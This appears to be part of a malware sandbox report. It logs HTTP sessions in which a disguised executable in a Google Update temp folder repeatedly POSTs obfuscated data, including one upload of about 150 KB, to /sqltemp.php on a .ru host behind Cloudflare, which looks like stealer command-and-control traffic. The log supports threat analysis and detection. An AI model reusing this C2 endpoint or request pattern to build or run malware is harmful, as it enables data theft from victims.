                                                                                                                  CF-RAY: 8fb363b32ee243b7-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2874&min_rtt=2433&rtt_var=1795&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1398&delivery_rate=244843&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  2192.168.2.649745104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:16.589689970 CET278OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1860
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:02:16.938364029 CET1860OUTData Raw: 53 50 5f 57 54 5d 54 55 58 56 52 59 56 5a 59 52 5b 58 54 59 55 59 50 5d 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SP_WT]TUXVRYVZYR[XTYUYP]Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.35X#/_0(/99S7,**'S>71+<:%?4:&Y.,Y--
                                                                                                                  Jan 1, 2025 16:02:17.054145098 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:17.313070059 CET959INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:17 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ub79c24wHtrUitEnRmbjSmzon0h8%2Fs9J%2Bdo74%2BoIjhaqEY2BNO2EaO3bFjypINoHrjKyLPvySFTVixvpVktKkGtvxruCWmOuNrPc8eah%2Bn8zZsifVZ2WxVHoo%2BwTXJ4C8FOs%2FrJR"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb363b44baa42d3-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=5007&min_rtt=2397&rtt_var=6119&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2138&delivery_rate=62717&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 00 1f 25 51 2a 2d 25 09 26 0b 38 5b 2b 2e 3b 1f 26 2e 03 01 3f 06 04 14 26 2d 3c 01 2a 07 0a 02 35 2f 31 5e 32 38 20 59 20 5b 37 13 27 0e 2b 59 05 1c 20 44 22 3f 0d 00 2a 2d 2c 07 32 01 31 11 26 2e 2c 16 3f 38 3c 1f 37 2b 3c 01 27 03 3c 13 29 04 20 1d 33 02 2b 14 39 06 2d 53 27 3a 2c 54 00 11 25 08 24 08 3b 05 20 19 02 59 35 31 29 1d 24 37 2a 53 25 12 2c 0b 23 00 21 05 25 1c 23 12 21 0a 22 12 25 2b 32 04 20 2d 28 0b 2a 2e 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98%Q*-%&8[+.;&.?&-<*5/1^28 Y [7'+Y D"?*-,21&.,?8<7+<'<) 3+9-S':,T%$; Y51)$7*S%,#!%#!"%+2 -(*.%S -H?WS0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  3192.168.2.649751104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:17.282624960 CET278OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1120
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:02:17.641423941 CET1120OUTData Raw: 56 50 5a 51 54 50 51 51 58 56 52 59 56 59 59 52 5b 52 54 5f 55 5f 50 5f 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VPZQTPQQXVRYVYYR[RT_U_P_Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$&7?3>(/9"# [?)*-<41?]*8%E$??R9*&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:02:17.726901054 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:18.011533022 CET805INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:17 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q8D%2BFVAkIhNhNIkwucIHob4n6WFR5ICTR0mm8Ycq7T2SaNLINW7XRJjqEyAm7%2BRPNT7PqPS0O9GNmi%2FMmUvwh0KAoWw0dWEuKOzES7zww6qya2VaQwvicztuJ6by2ulnuNIM4cC2"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb363b88f6b433e-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2547&min_rtt=1760&rtt_var=2235&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1398&delivery_rate=181074&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  4192.168.2.649761104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:18.207595110 CET278OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1120
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:02:18.565045118 CET1120OUTData Raw: 53 50 5f 53 51 5f 54 55 58 56 52 59 56 59 59 54 5b 5c 54 59 55 54 50 59 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SP_SQ_TUXVRYVYYT[\TYUTPYZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$>4Y=3>;C8: =8[(9R);72?;*17W,*&Y.,Y--
                                                                                                                  Jan 1, 2025 16:02:18.632294893 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:18.920722961 CET816INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:18 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7%2F2Rdb%2FWqlHPRbfPz58oaDJyItO%2FQqL27OVkMYRNo0SykFXmfNAK9obpS4J%2B2N5flvAelIaHnhb%2BkdhJInyK8Sv90y2xJ%2FAYH6CkXRtmH8Lpck%2F1Uj%2FcU%2B7OK4K9kYumraXHyAHQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb363be28b44411-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=5230&min_rtt=2160&rtt_var=6951&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1398&delivery_rate=54632&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  5192.168.2.649771104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:19.109544039 CET278OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:02:19.467936039 CET1124OUTData Raw: 56 5e 5a 56 51 5c 54 54 58 56 52 59 56 5c 59 51 5b 5d 54 5d 55 58 50 5f 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: V^ZVQ\TTXVRYV\YQ[]T]UXP_Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.'," ,=$>4,*%U#*);*#"0?;.1/;R9*&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:02:19.553513050 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:19.766470909 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:19.820770979 CET817INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:19 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L6bFR4lcm%2F1%2FnFQWXz%2FcplJLw%2FKx5MNctkbc5nfhslf6KcST3JcWvNsHCvPZ77ze4XvzQls%2Bl3OxDY7epA30LGB1DTDx7N%2Bi%2BcEt93hhyLRHEj%2B%2F6jYvtEf3xWcziqyStwFNvJbo"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb363c3ed95426b-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2457&min_rtt=1688&rtt_var=2172&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=186129&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  6192.168.2.649778104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:20.024027109 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  7192.168.2.649780104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:20.250724077 CET304OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 150660
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:20.598762035 CET12360OUTData Raw: 56 52 5f 52 51 5d 54 57 58 56 52 59 56 50 59 5e 5b 5d 54 5e 55 58 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VR_RQ]TWXVRYVPY^[]T^UXP^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$ -_0$8-W7Z?)(>72+Z?+"&/?-*&Y.,Y-
                                                                                                                  Jan 1, 2025 16:02:20.603796959 CET4944OUTData Raw: 20 39 28 3a 0a 5a 33 5a 03 04 3f 55 3b 03 12 3e 03 59 3e 11 3a 3e 23 30 2b 58 39 15 09 57 27 05 3e 24 33 01 3d 20 18 33 20 43 35 2f 3d 2e 0e 34 38 5f 0f 1d 26 08 0e 39 3a 20 0f 03 0b 28 50 59 39 03 2f 18 33 3b 26 1c 3f 3f 2d 32 37 0a 00 5b 10 06
                                                                                                                  Data Ascii: 9(:Z3Z?U;>Y>:>#0+X9W'>$3= 3 C5/=.48_&9: (PY9/3;&??-27[4 #R9Y:21*4>2-2R'W3?7 8X2Y0<#<&=60:.(./[7R>?4>0:2:628- <Z5=0$9#/T_S(1;[=>#61QV%0$\,!==)!(9'-.3]W1.*3\' ,V?W(1U7>(\ 1Z
                                                                                                                  Jan 1, 2025 16:02:20.603848934 CET2472OUTData Raw: 26 35 3f 24 01 30 23 05 28 5a 18 42 37 06 02 26 2b 2c 08 5d 35 3a 04 55 0e 30 11 0b 23 12 57 14 20 11 0b 5b 0c 3c 3a 3f 20 2d 2e 1c 09 3e 15 07 38 5c 2e 17 3a 07 0d 38 07 5d 02 35 06 5b 27 3c 34 31 1e 24 34 05 3d 09 3d 5b 28 2e 07 3c 26 5e 3f 39
                                                                                                                  Data Ascii: &5?$0#(ZB7&+,]5:U0#W [<:? -.>8\.:8]5['<41$4==[(.<&^?9!)($Z,(.8# &< >):&X!32T(,.:/R05?:2](;6?:/,- "?T,571/>>#3<S?1[8>7 ]?.>),@2_(;. .;=4(90#8']"(<$1) Z<R=-*T8/6W^Y\";-
                                                                                                                  Jan 1, 2025 16:02:20.603921890 CET12360OUTData Raw: 3b 5a 27 18 04 39 34 56 0e 02 2c 3c 3b 5b 27 1d 33 5d 3f 14 0c 05 30 5c 34 05 07 54 27 2d 33 2e 31 2d 03 37 33 33 3f 2a 0f 25 2f 3e 3b 21 1c 24 0f 28 0f 34 0e 04 38 0d 0d 00 52 1b 3e 21 24 1c 23 32 03 5e 27 37 25 13 0f 05 0d 54 33 04 55 0c 3f 5a
                                                                                                                  Data Ascii: ;Z'94V,<;['3]?0\4T'-3.1-733?*%/>;!$(48R>!$#2^'7%T3U?ZA0/%>82<+$/$X[(;#T8.-3X"]] '.)3%Y;3<72-#0[3_6'$?R.>%#>R<>"2']>]&X3W-Q*-1>>Q9--\[0%1+: _+7Z 2$14(V?
                                                                                                                  Jan 1, 2025 16:02:20.604046106 CET4944OUTData Raw: 3d 2f 02 29 30 3b 0b 13 27 2d 17 0b 30 22 52 29 24 5d 19 00 36 3f 2f 23 2b 06 31 44 05 2f 5f 31 33 3e 25 32 35 5c 0f 0e 3a 22 01 17 0b 05 34 1c 39 59 08 13 3d 3c 0b 11 20 3d 3e 24 0e 3c 34 33 37 5c 26 37 3d 04 33 3a 2b 29 1e 53 2c 59 27 5d 0d 0d
                                                                                                                  Data Ascii: =/)0;'-0"R)$]6?/#+1D/_13>%25\:"49Y=< =>$<437\&7=3:+)S,Y']0'0=?Y85*05:*2609$"8-!9X_(.*V1-*W08X)[>)^5;4%<>>>:!814?>">4 X;,?,#X>7$+R?$2?/33(=Q:+5<U0T<&TWH 4-0A SYS8)
                                                                                                                  Jan 1, 2025 16:02:20.608778000 CET4944OUTData Raw: 0c 56 3f 5a 36 28 3e 05 08 33 20 22 01 5b 29 1d 3f 16 31 5e 28 1d 29 3f 32 30 31 1c 08 06 20 34 2f 5d 1f 34 3f 3e 2c 27 3f 33 1c 30 3d 3e 3d 1d 26 22 3b 2a 07 3c 12 3e 24 5b 0b 58 2a 5d 31 1f 0b 5a 53 58 29 14 5f 10 0d 2e 25 5f 39 24 2c 5e 3f 5b
                                                                                                                  Data Ascii: V?Z6(>3 "[)?1^()?201 4/]4?>,'?30=>=&";*<>$[X*]1ZSX)_.%_9$,^?[UW:/2'5Z!^=2]:-U$#!]_3.H[;/- !4..:,T!1?:Q1+Z7.U>6!-=,;5<3_9=0>214,)_*-;[#T"%?(1#=Y74Z[+,/:?809'Y?=]=//;.
                                                                                                                  Jan 1, 2025 16:02:20.608808994 CET4944OUTData Raw: 3d 3f 0e 5d 27 32 0a 1a 32 0b 19 18 36 11 27 32 02 2f 06 03 3c 3c 13 5a 27 13 1e 5d 3f 34 23 20 09 2b 24 05 0d 31 27 5a 3e 3b 15 2c 3a 04 37 5e 39 06 1c 15 30 3d 23 50 28 3d 1b 52 0b 56 16 15 23 19 33 2e 20 30 49 3c 38 38 0b 12 3c 3f 5f 30 3b 06
                                                                                                                  Data Ascii: =?]'226'2/<<Z']?4# +$1'Z>;,:7^90=#P(=RV#3. 0I<88<?_0;;&> T!32<0]"-/@5V5^+5&/#-14&(<!9(:^9?(?V;;6 =^" 74;(7X;?6/>=>0_]S9)87%[7 &X>Z_3-6<6!U5,U4;<>:[.<
                                                                                                                  Jan 1, 2025 16:02:20.608836889 CET2472OUTData Raw: 20 17 07 15 3e 3e 0e 10 0d 1d 31 20 3f 02 0f 58 3f 3c 2c 27 31 35 22 12 25 5a 17 26 31 31 3d 1c 22 5f 40 06 32 2c 23 23 2b 3d 2e 06 31 00 0a 01 2b 2f 25 18 07 35 22 56 3a 22 3f 04 0d 3e 20 55 3e 2e 0f 27 3a 59 55 24 37 5a 3a 04 39 5b 34 40 05 3d
                                                                                                                  Data Ascii: >>1 ?X?<,'15"%Z&11="_@2,##+=.1+/%5"V:"?> U>.':YU$7Z:9[4@=#Z;\6-4-?0;\0_>29-68%_04"#U09-39-^\7">,.*T=U3=/3>>+R?_:2,=^^P&8_9"4>.U/'">P)-;^,"Z=\44 ^,&.#<,^3+$ZV^:X*??>#&*?^W789P
                                                                                                                  Jan 1, 2025 16:02:20.608939886 CET2472OUTData Raw: 0a 3d 00 3b 0e 29 06 5f 39 3c 06 5f 33 0d 34 06 35 32 0e 09 3f 5a 09 02 2a 5a 24 05 3c 11 3e 00 0b 13 19 2f 2b 3a 09 0e 38 28 02 25 24 2d 37 3d 31 28 09 55 33 04 34 58 39 5b 22 55 33 3f 15 56 33 58 56 20 3b 36 48 21 37 51 27 21 0e 20 45 27 0a 35
                                                                                                                  Data Ascii: =;)_9<_3452?Z*Z$<>/+:8(%$-7=1(U34X9["U3?V3XV ;6H!7Q'! E'560?;)'0?[6'+% *P4]'Y5 7![8<+R 0"39RX+/9") "P.<(W0)8'[ X8:5+*3=;9><<\&9,9=5=7B?=31[$^)&.&(>9Q0-?U$\2$$ZV
                                                                                                                  Jan 1, 2025 16:02:20.609020948 CET4944OUTData Raw: 03 26 2e 25 0c 3c 59 12 28 3a 23 52 03 2f 37 2c 3d 1c 34 12 36 5e 0b 40 25 2f 02 11 02 2e 5a 2d 3e 02 17 5a 2b 29 03 1a 3e 33 0c 3c 3f 04 3c 1e 31 28 03 5c 0a 3d 24 17 31 0d 08 0f 04 5a 0f 0b 39 23 50 07 07 2c 5b 0b 0d 07 31 31 29 3b 52 35 3b 22
                                                                                                                  Data Ascii: &.%<Y(:#R/7,=46^@%/.Z->Z+)>3<?<1(\=$1Z9#P,[11);R5;",-54:";\.0>V$5;?^>[S^=.'<\++_80$$YD31/T-9>]#<'7Q833"' 93!?7:0;%"V[X6V%#&X:Y Q59*,"[8;"^8\<32!&>10=+%!2?/>
                                                                                                                  Jan 1, 2025 16:02:20.694576025 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:21.665632010 CET808INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:21 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7k7ln8QuEZdDEwIIxmN9790YAF6scfv0QKkDwQ1ecAW7LG8lJQiq7i9qIfhYhB%2Br2MO3IVTTljvhJrJN9Z1EQpXEaOfzGZhbvHex1ivpw0uU4XFLjrH1GFEoXVcqAcR8zz%2FPcYDj"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb363cb094e42b0-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2251&min_rtt=1758&rtt_var=1645&sent=53&recv=156&lost=0&retrans=0&sent_bytes=25&recv_bytes=150964&delivery_rate=256050&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  8192.168.2.662429104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:20.450995922 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:20.797820091 CET1124OUTData Raw: 56 51 5f 50 51 5c 54 57 58 56 52 59 56 58 59 5e 5b 5d 54 5a 55 5a 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VQ_PQ\TWXVRYVXY^[]TZUZPXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-3?6#"%-',& 0[+:$=-' 23Y<;:%?S.&Y.,Y-%
                                                                                                                  Jan 1, 2025 16:02:20.895581961 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:21.156426907 CET804INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:21 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7k%2FTtCHQhsM2UqzXlYkXfp%2BNFNdrHuqr86XvGPAgXljlhQB%2Bh7x2MFPAkAOc6WGgzLFNO3WD5Grp9VKiwRRfDjdzIE8qOGOTP63h3kVjPCDdihg4x1Od0ar97yfYkCrQOPgQ0B1o"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb363cc58a24246-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4047&min_rtt=1614&rtt_var=5472&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=69253&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  9192.168.2.662436104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:21.662587881 CET278OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
